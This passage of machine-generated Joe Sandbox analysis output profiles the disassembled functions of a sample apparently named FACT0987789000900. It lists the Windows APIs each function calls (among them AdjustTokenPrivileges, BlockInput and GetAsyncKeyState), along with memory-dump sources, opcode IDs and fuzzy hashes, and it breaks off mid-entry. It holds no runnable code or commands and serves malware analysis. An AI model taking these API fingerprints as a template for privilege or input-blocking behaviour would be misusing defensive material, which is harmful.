                                                                                                                • Instruction Fuzzy Hash: 57F0677480024DAFDB059FA0C809BFE7FB0EF10305F00800AF966A6292D77986169FA4
                                                                                                                APIs
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004CACC0), ref: 004CAB99
                                                                                                                • CloseHandle.KERNEL32(?,?,004CACC0), ref: 004CABAB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 81990902-0
                                                                                                                • Opcode ID: e2208a2ad2074405a627209da0f86a55df9498bc0fcffcda0f5e5b5c6201df9f
                                                                                                                • Instruction ID: 095b793d3dd8da26a02b6e192424fb78ea60f619585826f7f0146424fb993e4d
                                                                                                                • Opcode Fuzzy Hash: e2208a2ad2074405a627209da0f86a55df9498bc0fcffcda0f5e5b5c6201df9f
                                                                                                                • Instruction Fuzzy Hash: 38E08631000610BFE7212F55EC08DB3B7F9EF04320710C82EF85980431D7266C94DB50
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 004FF7CB
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0050E4AA,?,?,?,?), ref: 004FF7F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2065330234-0
                                                                                                                • Opcode ID: 917ff72bfe2f25684c795fea3e20fcc104cb42e40ace5612fa45dee6584f356e
                                                                                                                • Instruction ID: 90f06ecf0fdb96d1b00f8e6a207fab1b0313e3cdb808e24d996b447b67f02af7
                                                                                                                • Opcode Fuzzy Hash: 917ff72bfe2f25684c795fea3e20fcc104cb42e40ace5612fa45dee6584f356e
                                                                                                                • Instruction Fuzzy Hash: D9E0C230104218BBEB141F09DC0AFBE3F68EB10B50F108126FA5B980E0E7B59895E274
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,004B6DB3,-0000031A,?,?,00000001), ref: 004B81B1
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004B81BA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: a4a2a3e1c5852057de81396d435ee28838d9b1b106916b78225eb85213102a96
                                                                                                                • Instruction ID: a05db1b9b68015dc70a8b2cb66009a85a0c2350cdfc100c6553ebca1b52de749
                                                                                                                • Opcode Fuzzy Hash: a4a2a3e1c5852057de81396d435ee28838d9b1b106916b78225eb85213102a96
                                                                                                                • Instruction Fuzzy Hash: F9B09231044608ABDB402BA1EC09B98BF78EB18652F008410F62D44061CB725414AAA2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 5f17548e4a40a1f5f61597aea0f8687d038912d9ec8aa8093be41ea291a3d8a2
                                                                                                                • Instruction ID: 183a539b661cdeb0700d0951e30e7c826d72e1d920f88023ca3497f6994a8e69
                                                                                                                • Opcode Fuzzy Hash: 5f17548e4a40a1f5f61597aea0f8687d038912d9ec8aa8093be41ea291a3d8a2
                                                                                                                • Instruction Fuzzy Hash: 44A25A74A04219CFDF24CF58C8806EDBBB1FF48314F2581AAD859AB391D7349E82DB95
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3728558374-2766056989
                                                                                                                • Opcode ID: 3381c5e07cf3bb1c1ec2308634cbc68ae64704d12abd28389e932416e8ef5ecd
                                                                                                                • Instruction ID: 1540ec06ac4533e744c93f4d99d01c50522c89826b5bdc379559018e41198aa1
                                                                                                                • Opcode Fuzzy Hash: 3381c5e07cf3bb1c1ec2308634cbc68ae64704d12abd28389e932416e8ef5ecd
                                                                                                                • Instruction Fuzzy Hash: 1D72BD30D042099FCF10DF94C485AAEBBB5FF6A304F14805AF905AB391D778AE46CB99
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c18b839542b4c7254d80823c5c6c908dda5c437345a551f4b53a001abbf33463
                                                                                                                • Instruction ID: a254b0506ec3f5a053f677f2fa03bb615c6afaa9dbb4bd5aa64f214399d32ae2
                                                                                                                • Opcode Fuzzy Hash: c18b839542b4c7254d80823c5c6c908dda5c437345a551f4b53a001abbf33463
                                                                                                                • Instruction Fuzzy Hash: FA324562D29F014DD7339634C922376A288EFB73D4F15D737E81AB5EAAEB28C4835114
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 674341424-0
                                                                                                                • Opcode ID: 0afde5881cddb8ed71e7e7bc1ac094ad8e698068c369d029b533e3eece8c9caf
                                                                                                                • Instruction ID: d705a7a41ff119ae24d26cb7afff2d1e3a966a163b95497bea8be2e9241f2216
                                                                                                                • Opcode Fuzzy Hash: 0afde5881cddb8ed71e7e7bc1ac094ad8e698068c369d029b533e3eece8c9caf
                                                                                                                • Instruction Fuzzy Hash: 5D2299715083019BDB24DF18C891B6FBBE4BF95314F10492EF89A87291DB79EC45CB8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d130cb099019c70ffa8ae7bcbfee8fe1e1b63ffae65d5b8cd87262d1fa24568
                                                                                                                • Instruction ID: 4175473af68021aedade33eaa7e2240178d5134aff7ebdefdaa7d7a51c4f6131
                                                                                                                • Opcode Fuzzy Hash: 2d130cb099019c70ffa8ae7bcbfee8fe1e1b63ffae65d5b8cd87262d1fa24568
                                                                                                                • Instruction Fuzzy Hash: FAB1EE20D2AF414DD22396398C35336B79CAFBB2D5B91D71BFC2A74D22FB2185875180
                                                                                                                APIs
                                                                                                                • __time64.LIBCMT ref: 004DB6DF
                                                                                                                  • Part of subcall function 004B344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004DBDC3,00000000,?,?,?,?,004DBF70,00000000,?), ref: 004B3453
                                                                                                                  • Part of subcall function 004B344A: __aulldiv.LIBCMT ref: 004B3473
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2893107130-0
                                                                                                                • Opcode ID: 3ecccfce50b2494b1947e5457e27f589addb809f5fca2bbcfb8ac76b13d96a89
                                                                                                                • Instruction ID: 3d1b1a01cb5685c623f4c011884cbf992f8be33d5238347fe34b9e1ebf0931b4
                                                                                                                • Opcode Fuzzy Hash: 3ecccfce50b2494b1947e5457e27f589addb809f5fca2bbcfb8ac76b13d96a89
                                                                                                                • Instruction Fuzzy Hash: 2921E772630610CBC719CF39C491A92B7E0EB95311B258E7EE0E5CB2C0CB38B909DB94
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 005004F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2065330234-0
                                                                                                                • Opcode ID: 79626c347f43d3da18f616e8a5d626b5f9ea78ac80be4a758e1d2eef7fee3001
                                                                                                                • Instruction ID: 25fc929de9e8f367c41707ebfc6d0cc8f495c88227a0cefdcadf011992d07ece
                                                                                                                • Opcode Fuzzy Hash: 79626c347f43d3da18f616e8a5d626b5f9ea78ac80be4a758e1d2eef7fee3001
                                                                                                                • Instruction Fuzzy Hash: 15110671204615BAFF245B28CC16FBD3F14EB41B20F20871AFB129E5D2CA785D01A29D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0050E467,?,?,?,?,00000000,?), ref: 00500127
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2065330234-0
                                                                                                                • Opcode ID: b9c0eef77fab4ea91ef8ca7ddb5ddbffb35595e69dc323e006a4d3463bd3c8ba
                                                                                                                • Instruction ID: 634e3eb8597cba2e53386f5bd97d761b29111574aceb68492a03196d15430d89
                                                                                                                • Opcode Fuzzy Hash: b9c0eef77fab4ea91ef8ca7ddb5ddbffb35595e69dc323e006a4d3463bd3c8ba
                                                                                                                • Instruction Fuzzy Hash: 5101CC31A00014ABDB148F24DC4ABBE3FA2FF85325F185129F95A1B1D2C3319C21E660
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0050E467,?,?,?,?,00000000,?), ref: 00500127
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2065330234-0
                                                                                                                • Opcode ID: ae5494707dc43276cca93b2276763d2ba67fe261f8390fa3f5d15c319266150c
                                                                                                                • Instruction ID: de9d156029f51c87a2efde843272839c04217422ede95d3aa672660d48d73897
                                                                                                                • Opcode Fuzzy Hash: ae5494707dc43276cca93b2276763d2ba67fe261f8390fa3f5d15c319266150c
                                                                                                                • Instruction Fuzzy Hash: 8801B171A00118ABDB149F25DC5ABFE3FA2FF85325F085129FA591B1D2C371AC20D7A0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537
                                                                                                                • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 004FE9F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CallLongProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4084987330-0
                                                                                                                • Opcode ID: 3d4714d1c2dcf285249cb3b5be65b2479b4eec885ebc80087c9f38167681d472
                                                                                                                • Instruction ID: 7a06f8b23e4051293b78c5c222f156cd3b875cd49f764121ffba9bfffbc53662
                                                                                                                • Opcode Fuzzy Hash: 3d4714d1c2dcf285249cb3b5be65b2479b4eec885ebc80087c9f38167681d472
                                                                                                                • Instruction Fuzzy Hash: 06F03C7110010CAFCB159F95EC10DB93BA6FB18326B048116FE155B6B1C77A9861EBA4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                  • Part of subcall function 004AB63C: GetCursorPos.USER32(000000FF), ref: 004AB64F
                                                                                                                  • Part of subcall function 004AB63C: ScreenToClient.USER32(00000000,000000FF), ref: 004AB66C
                                                                                                                  • Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000001), ref: 004AB691
                                                                                                                  • Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000002), ref: 004AB69F
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0050E514,?,?,?,?,?,00000001,?), ref: 004FECCA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2356834413-0
                                                                                                                • Opcode ID: af1ddced91a49f76b45a52c039c46cfb22e731caa8ab0c33c7a249106f00fe18
                                                                                                                • Instruction ID: d6f5880bfaa5f075c30e81735a7afe2d14459a8ae0d4024044e6e2351f2d7864
                                                                                                                • Opcode Fuzzy Hash: af1ddced91a49f76b45a52c039c46cfb22e731caa8ab0c33c7a249106f00fe18
                                                                                                                • Instruction Fuzzy Hash: 06F0A730200228ABDF145F0ADC16EFE3FA5EB11752F004016F9051B2A2C7769865EBD9
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 004AAB45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2065330234-0
                                                                                                                • Opcode ID: 7edfdeea96c306c0d75399361dc2057be77a9cbe746c3cd25c15c395a73d81a4
                                                                                                                • Instruction ID: 45e494fd8357cac06bd9d76d298f14ab6f2514f54bc3084532c5c01e1c2dfa09
                                                                                                                • Opcode Fuzzy Hash: 7edfdeea96c306c0d75399361dc2057be77a9cbe746c3cd25c15c395a73d81a4
                                                                                                                • Instruction Fuzzy Hash: 8DF0E230200305DFDB188F04DC21A793FA2FB20362F04421AFD124B6A0D771D820EB64
                                                                                                                APIs
                                                                                                                • BlockInput.USER32(00000001), ref: 004E6ACA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
